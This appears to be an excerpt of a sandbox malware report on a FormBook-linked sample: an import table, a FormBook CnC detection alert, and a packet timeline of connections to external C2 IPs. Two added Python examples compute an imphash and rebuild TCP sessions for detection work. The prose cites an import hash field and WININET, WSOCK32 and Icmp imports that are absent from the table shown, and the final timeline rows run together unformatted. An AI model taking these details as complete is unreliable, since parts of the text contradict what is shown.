KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
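Two things a practitioner does with an import table like this one: recompute the import hash (the Import Hash field above, afcdf79be1557326c854b6e20cb900a7, is that value) to pivot to related samples, and map the imported API to capabilities worth a detection. The import set here, WININET and WSOCK32 next to BlockInput, mciSendStringW, IsThemeActive and the Icmp* and WNet* families, is characteristic of the AutoIt3 interpreter stub, so the capability tags describe what the runtime exposes; which of them the embedded script actually calls is not visible in the IAT. The following is an added example, not code from the Joe Sandbox report. It reimplements the imphash normalisation that pefile's get_imphash uses (lower-case, extension stripped, "dll.func" joined with commas in import-table order, MD5), assumes the rows are in import-table order, and feeds only a constructed excerpt of the table, so its hash is not expected to equal the report's; the capability groups are this example's own.

```python
"""Added example, not part of the Joe Sandbox report: recompute an import hash
the way pefile's get_imphash does, and tag the imports with capabilities a
detection engineer looks for. Input is an excerpt of the import table in the
report's 'DLL | functions' row form."""
import hashlib
from typing import Dict, List, Set, Tuple

# Constructed excerpt of the import table above (the real rows are longer).
IMPORT_ROWS = """\
WSOCK32.dll | WSACleanup, socket, inet_ntoa, gethostbyname, connect, send, recv
WININET.dll | InternetOpenW, HttpOpenRequestW, HttpSendRequestW, InternetReadFile, FtpOpenFileW
KERNEL32.dll | OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateToolhelp32Snapshot, Process32FirstW, IsDebuggerPresent, OutputDebugStringW, CreateProcessW, DeviceIoControl
USER32.dll | BlockInput, keybd_event, mouse_event, SendInput, GetAsyncKeyState, OpenClipboard, GetClipboardData, SetClipboardData, OpenDesktopW, SetProcessWindowStation, ExitWindowsEx
ADVAPI32.dll | OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, LogonUserW, RegSetValueExW, RegDeleteValueW
"""

# Capability groups chosen for this example; every name appears in the table.
CAPABILITIES: Dict[str, Set[str]] = {
    "remote-process-memory": {"OpenProcess", "VirtualAllocEx", "WriteProcessMemory",
                              "ReadProcessMemory", "VirtualFreeEx"},
    "process-enumeration": {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"},
    "token-and-logon": {"OpenProcessToken", "AdjustTokenPrivileges", "LookupPrivilegeValueW",
                        "DuplicateTokenEx", "CreateProcessAsUserW", "CreateProcessWithLogonW",
                        "LogonUserW"},
    "input-capture-or-block": {"BlockInput", "keybd_event", "mouse_event", "SendInput",
                               "GetAsyncKeyState", "GetKeyboardState", "SetKeyboardState",
                               "AttachThreadInput"},
    "clipboard": {"OpenClipboard", "GetClipboardData", "SetClipboardData", "EmptyClipboard"},
    "http-ftp-client": {"InternetOpenW", "HttpOpenRequestW", "HttpSendRequestW",
                        "InternetReadFile", "InternetOpenUrlW", "FtpOpenFileW"},
    "raw-sockets": {"socket", "connect", "send", "recv", "listen", "accept", "bind",
                    "gethostbyname"},
    "anti-debug": {"IsDebuggerPresent", "OutputDebugStringW"},
    "desktop-and-winsta": {"OpenDesktopW", "OpenWindowStationW", "SetProcessWindowStation"},
    "shutdown-or-reboot": {"ExitWindowsEx", "InitiateSystemShutdownExW", "SetSystemPowerState"},
}


def parse_import_rows(text: str) -> List[Tuple[str, str]]:
    """(dll, function) pairs in the order the rows list them."""
    pairs: List[Tuple[str, str]] = []
    for line in text.splitlines():
        if "|" not in line:
            continue
        dll, funcs = (part.strip() for part in line.split("|", 1))
        pairs.extend((dll, f.strip()) for f in funcs.split(",") if f.strip())
    return pairs


def imphash_string(pairs: List[Tuple[str, str]]) -> str:
    """pefile's normalisation: lower-case, drop a .dll/.ocx/.sys extension,
    'dll.func' entries joined with commas in import-table order. Ordinal-only
    imports (none in this table) would be written as 'ordN'."""
    parts = []
    for dll, func in pairs:
        name = dll.lower()
        for ext in (".dll", ".ocx", ".sys"):
            if name.endswith(ext):
                name = name[:-len(ext)]
                break
        parts.append(f"{name}.{func.lower()}")
    return ",".join(parts)


def imphash(pairs: List[Tuple[str, str]]) -> str:
    return hashlib.md5(imphash_string(pairs).encode()).hexdigest()


def capabilities(pairs: List[Tuple[str, str]]) -> Dict[str, List[str]]:
    """Capability tag -> sorted imported functions that triggered it."""
    imported = {func for _, func in pairs}
    return {tag: sorted(imported & apis)
            for tag, apis in CAPABILITIES.items() if imported & apis}


if __name__ == "__main__":
    pairs = parse_import_rows(IMPORT_ROWS)
    print("imphash of excerpt:", imphash(pairs))
    for tag, funcs in capabilities(pairs).items():
        print(f"{tag:24s} {', '.join(funcs)}")
```

Because the hash covers names in import-table order, the same API set in a different order gives a different imphash; that is what makes it a build-toolchain fingerprint rather than a capability fingerprint, and why the capability tags are computed separately as a set intersection.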
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-13T11:41:00.998018+0100 | 2856318 | ETPRO MALWARE FormBook CnC Checkin (POST) M4 | 1 | 192.168.2.10 | 49918 | 192.197.113.112 | 80 | TCP
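The Suricata hit (SID 2856318 at 11:41:00.998018 CET, client port 49918 to 192.197.113.112:80) is one packet of one TCP session in the packet timeline that follows, where the client opens a series of short port-80 connections to 85.159.66.93, then 192.197.113.112, then 194.9.94.86. The following is an added example, not code from the Joe Sandbox report: it rebuilds sessions from timeline rows (a constructed excerpt, copied in the timeline's column order of timestamp, source port, dest port, source IP, dest IP) and locates the session the alert belongs to. The timeline carries no payload sizes or TCP flags, so a session here is only its endpoints, packet count and lifetime; treating the first packet of each endpoint pair as the client's SYN is an assumption that holds because the capture starts before every connection.

```python
"""Added example, not part of the Joe Sandbox report: rebuild TCP sessions
from the packet timeline and tie the Suricata alert to the session that
carried it. Rows use the timeline's column order: timestamp, source port,
dest port, source IP, dest IP."""
from collections import namedtuple
from dataclasses import dataclass, field
from datetime import datetime
from typing import Dict, FrozenSet, Iterable, List, Optional, Tuple

# Constructed sample: fourteen rows copied from the timeline, one session to
# each of the three servers (client ports 49867, 49918 and 49947).
SAMPLE_TIMELINE = """\
Dec 13, 2024 11:40:38.277985096 CET | 49867 | 80 | 192.168.2.10 | 85.159.66.93
Dec 13, 2024 11:40:59.360634089 CET | 49918 | 80 | 192.168.2.10 | 192.197.113.112
Dec 13, 2024 11:40:59.480540037 CET | 80 | 49918 | 192.197.113.112 | 192.168.2.10
Dec 13, 2024 11:40:59.480696917 CET | 49918 | 80 | 192.168.2.10 | 192.197.113.112
Dec 13, 2024 11:40:59.495857000 CET | 49918 | 80 | 192.168.2.10 | 192.197.113.112
Dec 13, 2024 11:40:59.615863085 CET | 80 | 49918 | 192.197.113.112 | 192.168.2.10
Dec 13, 2024 11:41:00.998018026 CET | 49918 | 80 | 192.168.2.10 | 192.197.113.112
Dec 13, 2024 11:41:01.057383060 CET | 80 | 49918 | 192.197.113.112 | 192.168.2.10
Dec 13, 2024 11:41:01.057465076 CET | 49918 | 80 | 192.168.2.10 | 192.197.113.112
Dec 13, 2024 11:41:01.057555914 CET | 80 | 49918 | 192.197.113.112 | 192.168.2.10
Dec 13, 2024 11:41:01.057605982 CET | 49918 | 80 | 192.168.2.10 | 192.197.113.112
Dec 13, 2024 11:41:01.117969036 CET | 80 | 49918 | 192.197.113.112 | 192.168.2.10
Dec 13, 2024 11:41:01.118108034 CET | 49918 | 80 | 192.168.2.10 | 192.197.113.112
Dec 13, 2024 11:41:12.128348112 CET | 49947 | 80 | 192.168.2.10 | 194.9.94.86
"""
# The Suricata row: timestamp, source port, dest IP.
ALERT = ("2024-12-13T11:41:00.998018+0100", 49918, "192.197.113.112")

Packet = namedtuple("Packet", "ts sport dport src dst")


@dataclass
class Session:
    client: str
    client_port: int
    server: str
    server_port: int
    packets: List[Packet] = field(default_factory=list)

    @property
    def duration(self) -> float:
        return (self.packets[-1].ts - self.packets[0].ts).total_seconds()


def parse_timeline_timestamp(text: str) -> datetime:
    """'Dec 13, 2024 11:40:59.360634089 CET' -> naive datetime. The report prints
    nanoseconds and datetime holds microseconds, so three digits are dropped;
    the zone suffix is ignored because every row is CET."""
    stamp, _zone = text.rsplit(" ", 1)
    base, frac = stamp.rsplit(".", 1)
    return datetime.strptime(base, "%b %d, %Y %H:%M:%S").replace(
        microsecond=int(frac[:6].ljust(6, "0")))


def parse_alert_timestamp(text: str) -> datetime:
    """Suricata's '...T11:41:00.998018+0100' as a naive local stamp, directly
    comparable with the timeline's local (CET) stamps."""
    return datetime.strptime(text, "%Y-%m-%dT%H:%M:%S.%f%z").replace(tzinfo=None)


def parse_packet(line: str) -> Packet:
    ts, sport, dport, src, dst = (col.strip() for col in line.split("|"))
    return Packet(parse_timeline_timestamp(ts), int(sport), int(dport), src, dst)


def reassemble(lines: Iterable[str]) -> List[Session]:
    """Group packets by unordered endpoint pair; the first packet seen for a
    pair defines the client side (assumes the capture saw the SYN)."""
    sessions: Dict[FrozenSet[Tuple[str, int]], Session] = {}
    for line in lines:
        if not line.strip():
            continue
        p = parse_packet(line)
        key = frozenset({(p.src, p.sport), (p.dst, p.dport)})
        if key not in sessions:
            sessions[key] = Session(p.src, p.sport, p.dst, p.dport)
        sessions[key].packets.append(p)
    return sorted(sessions.values(), key=lambda s: s.packets[0].ts)


def session_for_alert(sessions: List[Session], alert_ts: datetime,
                      src_port: int, dst_ip: str) -> Optional[Session]:
    """Session an IDS alert belongs to: same client port and server, and the
    alert timestamp inside the session's lifetime."""
    for s in sessions:
        if (s.client_port == src_port and s.server == dst_ip
                and s.packets[0].ts <= alert_ts <= s.packets[-1].ts):
            return s
    return None


def summarize(timeline: str = SAMPLE_TIMELINE):
    sessions = reassemble(timeline.splitlines())
    hit = session_for_alert(sessions, parse_alert_timestamp(ALERT[0]), *ALERT[1:])
    return sessions, hit


if __name__ == "__main__":
    sessions, hit = summarize()
    for s in sessions:
        print(f"{s.client}:{s.client_port} -> {s.server}:{s.server_port}  "
              f"{len(s.packets)} packets over {s.duration:.3f}s")
    print("alert carried by client port:", hit.client_port if hit else None)
```

Fed the full timeline in the same row form, reassemble gives one session per client port (49908, 49918, 49925, 49931 to 192.197.113.112; 49947, 49957, 49964 to 194.9.94.86), which is the per-server connection count to correlate with the DNS lookups and HTTP requests elsewhere in the report.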
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 13, 2024 11:40:38.277985096 CET | 49867 | 80 | 192.168.2.10 | 85.159.66.93
Dec 13, 2024 11:40:38.399696112 CET | 80 | 49867 | 85.159.66.93 | 192.168.2.10
Dec 13, 2024 11:40:38.399795055 CET | 49867 | 80 | 192.168.2.10 | 85.159.66.93
Dec 13, 2024 11:40:38.409822941 CET | 49867 | 80 | 192.168.2.10 | 85.159.66.93
Dec 13, 2024 11:40:38.529567957 CET | 80 | 49867 | 85.159.66.93 | 192.168.2.10
Dec 13, 2024 11:40:39.732321978 CET | 80 | 49867 | 85.159.66.93 | 192.168.2.10
Dec 13, 2024 11:40:39.732366085 CET | 80 | 49867 | 85.159.66.93 | 192.168.2.10
Dec 13, 2024 11:40:39.732495070 CET | 49867 | 80 | 192.168.2.10 | 85.159.66.93
Dec 13, 2024 11:40:39.736011028 CET | 49867 | 80 | 192.168.2.10 | 85.159.66.93
Dec 13, 2024 11:40:39.855712891 CET | 80 | 49867 | 85.159.66.93 | 192.168.2.10
Dec 13, 2024 11:40:56.688352108 CET | 49908 | 80 | 192.168.2.10 | 192.197.113.112
Dec 13, 2024 11:40:56.810705900 CET | 80 | 49908 | 192.197.113.112 | 192.168.2.10
Dec 13, 2024 11:40:56.810858965 CET | 49908 | 80 | 192.168.2.10 | 192.197.113.112
Dec 13, 2024 11:40:56.830984116 CET | 49908 | 80 | 192.168.2.10 | 192.197.113.112
Dec 13, 2024 11:40:56.950728893 CET | 80 | 49908 | 192.197.113.112 | 192.168.2.10
Dec 13, 2024 11:40:58.341840029 CET | 49908 | 80 | 192.168.2.10 | 192.197.113.112
Dec 13, 2024 11:40:58.406092882 CET | 80 | 49908 | 192.197.113.112 | 192.168.2.10
Dec 13, 2024 11:40:58.406109095 CET | 80 | 49908 | 192.197.113.112 | 192.168.2.10
Dec 13, 2024 11:40:58.406162977 CET | 49908 | 80 | 192.168.2.10 | 192.197.113.112
Dec 13, 2024 11:40:58.406244040 CET | 49908 | 80 | 192.168.2.10 | 192.197.113.112
Dec 13, 2024 11:40:58.462389946 CET | 80 | 49908 | 192.197.113.112 | 192.168.2.10
Dec 13, 2024 11:40:58.462630987 CET | 49908 | 80 | 192.168.2.10 | 192.197.113.112
Dec 13, 2024 11:40:59.360634089 CET | 49918 | 80 | 192.168.2.10 | 192.197.113.112
Dec 13, 2024 11:40:59.480540037 CET | 80 | 49918 | 192.197.113.112 | 192.168.2.10
Dec 13, 2024 11:40:59.480696917 CET | 49918 | 80 | 192.168.2.10 | 192.197.113.112
Dec 13, 2024 11:40:59.495857000 CET | 49918 | 80 | 192.168.2.10 | 192.197.113.112
Dec 13, 2024 11:40:59.615863085 CET | 80 | 49918 | 192.197.113.112 | 192.168.2.10
Dec 13, 2024 11:41:00.998018026 CET | 49918 | 80 | 192.168.2.10 | 192.197.113.112
Dec 13, 2024 11:41:01.057383060 CET | 80 | 49918 | 192.197.113.112 | 192.168.2.10
Dec 13, 2024 11:41:01.057465076 CET | 49918 | 80 | 192.168.2.10 | 192.197.113.112
Dec 13, 2024 11:41:01.057555914 CET | 80 | 49918 | 192.197.113.112 | 192.168.2.10
Dec 13, 2024 11:41:01.057605982 CET | 49918 | 80 | 192.168.2.10 | 192.197.113.112
Dec 13, 2024 11:41:01.117969036 CET | 80 | 49918 | 192.197.113.112 | 192.168.2.10
Dec 13, 2024 11:41:01.118108034 CET | 49918 | 80 | 192.168.2.10 | 192.197.113.112
Dec 13, 2024 11:41:02.017829895 CET | 49925 | 80 | 192.168.2.10 | 192.197.113.112
Dec 13, 2024 11:41:02.138000011 CET | 80 | 49925 | 192.197.113.112 | 192.168.2.10
Dec 13, 2024 11:41:02.138127089 CET | 49925 | 80 | 192.168.2.10 | 192.197.113.112
Dec 13, 2024 11:41:02.152693987 CET | 49925 | 80 | 192.168.2.10 | 192.197.113.112
Dec 13, 2024 11:41:02.272600889 CET | 80 | 49925 | 192.197.113.112 | 192.168.2.10
Dec 13, 2024 11:41:02.272689104 CET | 80 | 49925 | 192.197.113.112 | 192.168.2.10
Dec 13, 2024 11:41:03.654171944 CET | 49925 | 80 | 192.168.2.10 | 192.197.113.112
Dec 13, 2024 11:41:03.754610062 CET | 80 | 49925 | 192.197.113.112 | 192.168.2.10
Dec 13, 2024 11:41:03.754689932 CET | 80 | 49925 | 192.197.113.112 | 192.168.2.10
Dec 13, 2024 11:41:03.754749060 CET | 49925 | 80 | 192.168.2.10 | 192.197.113.112
Dec 13, 2024 11:41:03.754987955 CET | 49925 | 80 | 192.168.2.10 | 192.197.113.112
Dec 13, 2024 11:41:03.774003029 CET | 80 | 49925 | 192.197.113.112 | 192.168.2.10
Dec 13, 2024 11:41:03.774082899 CET | 49925 | 80 | 192.168.2.10 | 192.197.113.112
Dec 13, 2024 11:41:04.673681974 CET | 49931 | 80 | 192.168.2.10 | 192.197.113.112
Dec 13, 2024 11:41:04.793675900 CET | 80 | 49931 | 192.197.113.112 | 192.168.2.10
Dec 13, 2024 11:41:04.793795109 CET | 49931 | 80 | 192.168.2.10 | 192.197.113.112
Dec 13, 2024 11:41:04.809333086 CET | 49931 | 80 | 192.168.2.10 | 192.197.113.112
Dec 13, 2024 11:41:04.931687117 CET | 80 | 49931 | 192.197.113.112 | 192.168.2.10
Dec 13, 2024 11:41:06.378410101 CET | 80 | 49931 | 192.197.113.112 | 192.168.2.10
Dec 13, 2024 11:41:06.378647089 CET | 80 | 49931 | 192.197.113.112 | 192.168.2.10
Dec 13, 2024 11:41:06.378725052 CET | 49931 | 80 | 192.168.2.10 | 192.197.113.112
Dec 13, 2024 11:41:06.381520033 CET | 49931 | 80 | 192.168.2.10 | 192.197.113.112
Dec 13, 2024 11:41:06.501343966 CET | 80 | 49931 | 192.197.113.112 | 192.168.2.10
Dec 13, 2024 11:41:12.128348112 CET | 49947 | 80 | 192.168.2.10 | 194.9.94.86
Dec 13, 2024 11:41:12.249499083 CET | 80 | 49947 | 194.9.94.86 | 192.168.2.10
Dec 13, 2024 11:41:12.249631882 CET | 49947 | 80 | 192.168.2.10 | 194.9.94.86
Dec 13, 2024 11:41:12.277929068 CET | 49947 | 80 | 192.168.2.10 | 194.9.94.86
Dec 13, 2024 11:41:12.399692059 CET | 80 | 49947 | 194.9.94.86 | 192.168.2.10
Dec 13, 2024 11:41:13.564431906 CET | 80 | 49947 | 194.9.94.86 | 192.168.2.10
Dec 13, 2024 11:41:13.564450026 CET | 80 | 49947 | 194.9.94.86 | 192.168.2.10
Dec 13, 2024 11:41:13.564465046 CET | 80 | 49947 | 194.9.94.86 | 192.168.2.10
Dec 13, 2024 11:41:13.564506054 CET | 49947 | 80 | 192.168.2.10 | 194.9.94.86
Dec 13, 2024 11:41:13.564730883 CET | 80 | 49947 | 194.9.94.86 | 192.168.2.10
Dec 13, 2024 11:41:13.564743996 CET | 80 | 49947 | 194.9.94.86 | 192.168.2.10
Dec 13, 2024 11:41:13.564779043 CET | 49947 | 80 | 192.168.2.10 | 194.9.94.86
Dec 13, 2024 11:41:13.564960957 CET | 80 | 49947 | 194.9.94.86 | 192.168.2.10
Dec 13, 2024 11:41:13.565012932 CET | 49947 | 80 | 192.168.2.10 | 194.9.94.86
Dec 13, 2024 11:41:13.779284954 CET | 49947 | 80 | 192.168.2.10 | 194.9.94.86
Dec 13, 2024 11:41:14.797914028 CET | 49957 | 80 | 192.168.2.10 | 194.9.94.86
Dec 13, 2024 11:41:15.059552908 CET | 80 | 49957 | 194.9.94.86 | 192.168.2.10
Dec 13, 2024 11:41:15.059840918 CET | 49957 | 80 | 192.168.2.10 | 194.9.94.86
Dec 13, 2024 11:41:15.072442055 CET | 49957 | 80 | 192.168.2.10 | 194.9.94.86
Dec 13, 2024 11:41:15.192159891 CET | 80 | 49957 | 194.9.94.86 | 192.168.2.10
Dec 13, 2024 11:41:16.337105036 CET | 80 | 49957 | 194.9.94.86 | 192.168.2.10
Dec 13, 2024 11:41:16.337188005 CET | 80 | 49957 | 194.9.94.86 | 192.168.2.10
Dec 13, 2024 11:41:16.337199926 CET | 80 | 49957 | 194.9.94.86 | 192.168.2.10
Dec 13, 2024 11:41:16.337239027 CET | 49957 | 80 | 192.168.2.10 | 194.9.94.86
Dec 13, 2024 11:41:16.337482929 CET | 80 | 49957 | 194.9.94.86 | 192.168.2.10
Dec 13, 2024 11:41:16.337527037 CET | 49957 | 80 | 192.168.2.10 | 194.9.94.86
Dec 13, 2024 11:41:16.337551117 CET | 80 | 49957 | 194.9.94.86 | 192.168.2.10
Dec 13, 2024 11:41:16.337682962 CET | 80 | 49957 | 194.9.94.86 | 192.168.2.10
Dec 13, 2024 11:41:16.337692976 CET | 80 | 49957 | 194.9.94.86 | 192.168.2.10
Dec 13, 2024 11:41:16.337728977 CET | 49957 | 80 | 192.168.2.10 | 194.9.94.86
Dec 13, 2024 11:41:16.576208115 CET | 49957 | 80 | 192.168.2.10 | 194.9.94.86
Dec 13, 2024 11:41:17.595048904 CET | 49964 | 80 | 192.168.2.10 | 194.9.94.86
Dec 13, 2024 11:41:17.714850903 CET | 80 | 49964 | 194.9.94.86 | 192.168.2.10
Dec 13, 2024 11:41:17.714935064 CET | 49964 | 80 | 192.168.2.10 | 194.9.94.86
Dec 13, 2024 11:41:17.729728937 CET | 49964 | 80 | 192.168.2.10 | 194.9.94.86
Dec 13, 2024 11:41:17.850784063 CET | 80 | 49964 | 194.9.94.86 | 192.168.2.10
Dec 13, 2024 11:41:17.850796938 CET | 80 | 49964 | 194.9.94.86 | 192.168.2.10
Dec 13, 2024 11:41:19.144171000 CET | 80 | 49964 | 194.9.94.86 | 192.168.2.10
Dec 13, 2024 11:41:19.144351006 CET | 80 | 49964 | 194.9.94.86 | 192.168.2.10
Dec 13, 2024 11:41:19.144390106 CET | 80 | 49964 | 194.9.94.86 | 192.168.2.10
Dec 13, 2024 11:41:19.144520044 CET | 80 | 49964 | 194.9.94.86 | 192.168.2.10
Dec 13, 2024 11:41:19.144556046 CET | 80 | 49964 | 194.9.94.86 | 192.168.2.10
                                                Dec 13, 2024 11:41:19.144576073 CET8049964194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:19.144609928 CET4996480192.168.2.10194.9.94.86
                                                Dec 13, 2024 11:41:19.144654989 CET4996480192.168.2.10194.9.94.86
                                                Dec 13, 2024 11:41:19.144826889 CET8049964194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:19.144901037 CET4996480192.168.2.10194.9.94.86
                                                Dec 13, 2024 11:41:19.232501984 CET4996480192.168.2.10194.9.94.86
                                                Dec 13, 2024 11:41:20.256475925 CET4997080192.168.2.10194.9.94.86
                                                Dec 13, 2024 11:41:20.378798008 CET8049970194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:20.378922939 CET4997080192.168.2.10194.9.94.86
                                                Dec 13, 2024 11:41:20.388465881 CET4997080192.168.2.10194.9.94.86
                                                Dec 13, 2024 11:41:20.508384943 CET8049970194.9.94.86192.168.2.10
